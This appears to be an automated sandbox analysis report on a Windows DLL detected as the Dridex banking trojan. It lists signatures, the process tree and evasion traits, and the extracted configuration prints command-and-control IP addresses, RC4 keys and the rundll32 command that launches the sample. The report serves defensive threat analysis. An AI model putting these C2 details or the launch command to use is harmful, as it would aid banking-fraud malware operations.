Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.11362.23809

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware1.11362.23809 (renamed file extension from 23809 to dll)
Analysis ID:	544194
MD5:	43d4b9318439f6926dfbcf46a5291621
SHA1:	06581c15c15cf8345bef1cea5b32fbc7d7d71e03
SHA256:	b06b7b05e576d19367c383aabd9c8fed8cd5e7955e2f1493d326b9b5306c7439
Tags:	dllDridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7096 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 7160 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 3092 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 672 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000000.302508511.000000006EB51000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000002.326161614.000000006EB51000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000000.303906353.000000006EB51000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.loaddll32.exe.6eb50000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6eb50000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.2.rundll32.exe.6eb50000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.0.rundll32.exe.6eb50000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7160, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1, ProcessId: 3092

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 4.2.rundll32.exe.6eb50000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Virustotal: Detection: 24%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	ReversingLabs: Detection: 25%

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.309005544.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308263383.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308215068.000000000134F000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.323968085.00000000003C2000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.307282597.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.309602333.00000000008AE000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308258188.00000000008AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb% source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308275077.00000000008BA000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308923187.00000000008BA000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.309602333.00000000008AE000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308258188.00000000008AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.307282597.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.308275077.00000000008BA000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308923187.00000000008BA000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.309005544.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308263383.00000000008B4000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb8 source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28
Source: Joe Sandbox View	IP Address: 80.211.3.13 80.211.3.13

Source: WerFault.exe, 00000008.00000002.324204423.00000000012C7000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.323676784.00000000012B7000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.323760827.00000000012C6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.302581940.000000006EB6F000.00000002.00020000.sdmp	String found in binary or memory: http://www.n4pkg6fy8o.gaDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 1.2.loaddll32.exe.6eb50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6eb50000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6eb50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.rundll32.exe.6eb50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.302508511.000000006EB51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.326161614.000000006EB51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.303906353.000000006EB51000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 672

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB60730	1_2_6EB60730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB69370	1_2_6EB69370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB51494	1_2_6EB51494
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB5A4E8	1_2_6EB5A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB6143C	1_2_6EB6143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB58428	1_2_6EB58428

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB62234 NtDelayExecution,		1_2_6EB62234
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EB62820 NtAllocateVirtualMemory,		1_2_6EB62820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Virustotal: Detection: 24%
Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	ReversingLabs: Detection: 25%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3092 -s 672
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.11362.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3092

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2362.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.309005544.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308263383.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308215068.000000000134F000.00000004.00000001.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: nCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000008.00000002.323968085.00000000003C2000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.307282597.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.309602333.00000000008AE000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308258188.00000000008AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb% source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308275077.00000000008BA000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308923187.00000000008BA000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware1.11362.dll
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.309602333.00000000008AE000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308258188.00000000008AE000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.307282597.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.308275077.00000000008BA000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308923187.00000000008BA000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000008.00000003.313481280.0000000004B60000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000008.00000003.309005544.00000000008B4000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.308263383.00000000008B4000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdb8 source: WerFault.exe, 00000008.00000003.313486368.0000000004B66000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.313465542.0000000004B91000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EB5F6A8 push esi; mov dword ptr [esp], 00000000h

1_2_6EB5F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
